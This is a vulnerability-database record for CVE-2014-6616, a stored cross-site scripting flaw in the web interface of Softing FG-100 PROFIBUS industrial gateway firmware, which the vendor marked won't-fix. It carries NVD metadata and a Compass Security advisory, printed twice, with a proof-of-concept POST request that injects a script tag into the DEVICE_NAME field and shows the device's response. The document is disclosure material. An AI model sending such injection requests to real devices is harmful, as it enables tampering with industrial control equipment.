ID CVE-2014-6616 Type cve Reporter NVD Modified 2015-09-01T14:11:15
Description
Cross-site scripting (XSS) vulnerability in Softing FG-100 PROFIBUS Single Channel (FG-100-PB) with firmware FG-x00-PB_V2.02.0.00 allows remote attackers to inject arbitrary web script or HTML via the DEVICE_NAME parameter to cgi-bin/CFGhttp/.
{"reporter": "NVD", "enchantments": {"score": {"vector": "NONE", "value": 4.3}, "vulnersScore": 4.3}, "published": "2015-08-31T14:59:08", "cvelist": ["CVE-2014-6616"], "title": "CVE-2014-6616", "objectVersion": "1.2", "type": "cve", "hash": "7d9b14d9795d42e4b6fa767272b59f9083935e568584814679e66bbd38c84d00", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6616", "bulletinFamily": "NVD", "id": "CVE-2014-6616", "history": [], "scanner": [], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "modified": "2015-09-01T14:11:15", "viewCount": 0, "cpe": ["cpe:/o:softing:fg-x00_profibus_firmware:2.02.0.00"], "edition": 1, "description": "Cross-site scripting (XSS) vulnerability in Softing FG-100 PROFIBUS Single Channel (FG-100-PB) with firmware FG-x00-PB_V2.02.0.00 allows remote attackers to inject arbitrary web script or HTML via the DEVICE_NAME parameter to cgi-bin/CFGhttp/.", "references": ["http://www.securityfocus.com/bid/70917", "http://www.securityfocus.com/archive/1/archive/1/533903/100/0/threaded", "http://packetstormsecurity.com/files/128975/Softing-FG-100-PB-Cross-Site-Scripting.html"], "lastseen": "2016-09-03T21:06:51", "assessment": {"system": "", "name": "", "href": ""}}
{"securityvulns": [{"lastseen": "2018-08-31T11:10:55", "references": [], "description": "\r\n\r\n#############################################################\r\n#\r\n# COMPASS SECURITY ADVISORY\r\n# http://www.csnc.ch/en/downloads/advisories.html\r\n#\r\n#############################################################\r\n#\r\n# Product: Softing FG-100 PB\r\n# Vendor: Softing AG (www.softing.com)\r\n# CVD ID: CVE-2014-6616\r\n# Subject: XSS\r\n# Risk: High \r\n# Effect: Remotely exploitable\r\n# Author: Johannes Klick\r\n# \t Daniel Marzin\r\n# \t Ingmar Rosenhagen\r\n# Date: 05.11.2014 \r\n#\r\n#############################################################\r\n\r\nIntroduction:\r\n-------------\r\nSofting FG PROFIBUS [1] is a family of interfaces for remote access to\r\none, two or three PROFIBUS segments via Ethernet for device\r\nparameterization, controller programming and data acquisition. This\r\ndevice is used in industrial setups for making Profibus device available\r\nvia ethernet. Compass Security Deuschland GmbH [2] discovered a security\r\nflaw in the webgui of the device which allows execution of malicious\r\ncode in the context of the user's browser session.\r\n\r\nAffected:\r\n---------\r\nFirmware: FG-x00-PB_V2.02.0.00\r\n\r\nTechnical Description:\r\n----------------------\r\nThe web gui does not properly encode output of user data in at least one\r\nplace. Exploiting this vulnerability leads to stored cross-site\r\nscripting (XSS) and allows execution of JavaScript code \r\n\r\nThe vulnerable resource is the 'DEVICE_NAME' parameter:\r\n\r\nPOST /cgi-bin/CFGhttp HTTP/1.1\r\nHost: 192.168.2.3\r\nReferer: http://192.168.2.3/cgi-bin/CFGhttp\r\n\r\nsecond_chance=Yes&LOGIN=config&PASSWORD=password&SERIAL_NUMBER=0110000000&DE\r\nVICE_NAME=<SCRIPT>alert("XSS")</SCRIPT>&DEVICE_NAME_ORG=ROFLE&IPADDR=192.168\r\n.2.3&IPADDR_ORG=192.168.2.3&NETMASK=255.255.255.0&NETMASK_ORG=255.255.255.0&\r\nGATEWAY=0.0.0.0&GATEWAY_ORG=&MAINTENANCE_IP=192.168.212.231&MAINTENANCE_IP_O\r\nRG=192.168.212.231&STARTUP=RELOAD\r\n\r\nWhich results in the malicious code being embedded:\r\n\r\nHTTP/1.0 200 OK\r\nContent-type: text/html\r\nCache-Control: no-cache, must-revalidate\r\nPragma: no-cache\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01\r\nTransitional//EN""http://www.w3.org/TR/html4/strict.dtd">\r\n<html><head><title>Device Configuration</title></head><link\r\nrel="stylesheet" type="text/css"\r\nhref="../fg300_pb/styles/fg300_pb.css"><body><h1>New Network\r\nSettings</h1><table cellspacing=0 summary=""><tr><td><strong> Host Name\r\n</strong></td><td> <SCRIPT>alert("XSS")</SCRIPT> </td><td>\r\n</td></tr><tr><td><strong> IP Address </strong></td><td> 192.168.2.3\r\n</td><td> </td></tr><tr><td><strong> Subnet Mask\r\n</strong></td><td> 255.255.255.0 </td><td>\r\n</td></tr><tr><td><strong> Default Gateway </strong></td><td>\r\n</td><td> </td></tr><tr><td><strong> Maintenance IP Address\r\n</strong></td><td> 192.168.212.231 </td><td>\r\n</td></tr><tr><td><strong> New network parameters will be used\r\n</strong></td><td> immediately\r\n</td><td></td></tr></table><br></body></html>\r\n\r\n\r\n\r\nWorkaround / Fix:\r\n-----------------\r\nno patch is available\r\n\r\nTimeline:\r\n---------\r\nVendor Notified: 2014-09-15 \r\nVendor Response: 2014-10-24 \r\nVendor Status:\t Wont fix\r\n\r\nReferences:\r\n-----------\r\n[1]:\r\nhttp://industrial.softing.com/de/produkte/profibus-master-or-slave-configura\r\nble-single-channel-remote-interface.html\r\n[2]: http://www.csnc.de\r\n\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-11-10T00:00:00", "title": "CVE-2014-6616 Softing FG-100 Webui XSS", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:55", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-6616"], "modified": "2014-11-10T00:00:00", "id": "SECURITYVULNS:DOC:31371", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31371", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:58", "references": ["https://vulners.com/securityvulns/securityvulns:doc:31371", "https://vulners.com/securityvulns/securityvulns:doc:31372"], "description": "Backdoor accounts, crossite scripting.", "edition": 1, "reporter": "BUGTRAQ", "published": "2014-11-10T00:00:00", "title": "Softing FG-100 security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:58", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-6616", "CVE-2014-6617"], "modified": "2014-11-10T00:00:00", "id": "SECURITYVULNS:VULN:14083", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14083", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:11:51", "references": [], "description": "", "edition": 1, "reporter": "Daniel Marzin", "published": "2014-11-05T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "title": "Softing FG-100 PB Cross Site Scripting", "type": "packetstorm", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6616"], "modified": "2014-11-05T00:00:00", "id": "PACKETSTORM:128975", "href": "https://packetstormsecurity.com/files/128975/Softing-FG-100-PB-Cross-Site-Scripting.html", "sourceData": "`############################################################# \n# \n# COMPASS SECURITY ADVISORY \n# http://www.csnc.ch/en/downloads/advisories.html \n# \n############################################################# \n# \n# Product: Softing FG-100 PB \n# Vendor: Softing AG (www.softing.com) \n# CVD ID: CVE-2014-6616 \n# Subject: XSS \n# Risk: High \n# Effect: Remotely exploitable \n# Author: Johannes Klick \n# Daniel Marzin \n# Ingmar Rosenhagen \n# Date: 05.11.2014 \n# \n############################################################# \n \nIntroduction: \n------------- \nSofting FG PROFIBUS [1] is a family of interfaces for remote access to \none, two or three PROFIBUS segments via Ethernet for device \nparameterization, controller programming and data acquisition. This \ndevice is used in industrial setups for making Profibus device available \nvia ethernet. Compass Security Deuschland GmbH [2] discovered a security \nflaw in the webgui of the device which allows execution of malicious \ncode in the context of the user's browser session. \n \nAffected: \n--------- \nFirmware: FG-x00-PB_V2.02.0.00 \n \nTechnical Description: \n---------------------- \nThe web gui does not properly encode output of user data in at least one \nplace. Exploiting this vulnerability leads to stored cross-site \nscripting (XSS) and allows execution of JavaScript code \n \nThe vulnerable resource is the 'DEVICE_NAME' parameter: \n \nPOST /cgi-bin/CFGhttp HTTP/1.1 \nHost: 192.168.2.3 \nReferer: http://192.168.2.3/cgi-bin/CFGhttp \n \nsecond_chance=Yes&LOGIN=config&PASSWORD=password&SERIAL_NUMBER=0110000000&DE \nVICE_NAME=<SCRIPT>alert(\"XSS\")</SCRIPT>&DEVICE_NAME_ORG=ROFLE&IPADDR=192.168 \n.2.3&IPADDR_ORG=192.168.2.3&NETMASK=255.255.255.0&NETMASK_ORG=255.255.255.0& \nGATEWAY=0.0.0.0&GATEWAY_ORG=&MAINTENANCE_IP=192.168.212.231&MAINTENANCE_IP_O \nRG=192.168.212.231&STARTUP=RELOAD \n \nWhich results in the malicious code being embedded: \n \nHTTP/1.0 200 OK \nContent-type: text/html \nCache-Control: no-cache, must-revalidate \nPragma: no-cache \n \n \n<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 \nTransitional//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"> \n<html><head><title>Device Configuration</title></head><link \nrel=\"stylesheet\" type=\"text/css\" \nhref=\"../fg300_pb/styles/fg300_pb.css\"><body><h1>New Network \nSettings</h1><table cellspacing=0 summary=\"\"><tr><td><strong> Host Name \n</strong></td><td> <SCRIPT>alert(\"XSS\")</SCRIPT> </td><td> \n</td></tr><tr><td><strong> IP Address </strong></td><td> 192.168.2.3 \n</td><td> </td></tr><tr><td><strong> Subnet Mask \n</strong></td><td> 255.255.255.0 </td><td> \n</td></tr><tr><td><strong> Default Gateway </strong></td><td> \n</td><td> </td></tr><tr><td><strong> Maintenance IP Address \n</strong></td><td> 192.168.212.231 </td><td> \n</td></tr><tr><td><strong> New network parameters will be used \n</strong></td><td> immediately \n</td><td></td></tr></table><br></body></html> \n \n \n \nWorkaround / Fix: \n----------------- \nno patch is available \n \nTimeline: \n--------- \nVendor Notified: 2014-09-15 \nVendor Response: 2014-10-24 \nVendor Status: Wont fix \n \nReferences: \n----------- \n[1]: \nhttp://industrial.softing.com/de/produkte/profibus-master-or-slave-configura \nble-single-channel-remote-interface.html \n[2]: http://www.csnc.de \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128975/softing-xss.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}]}
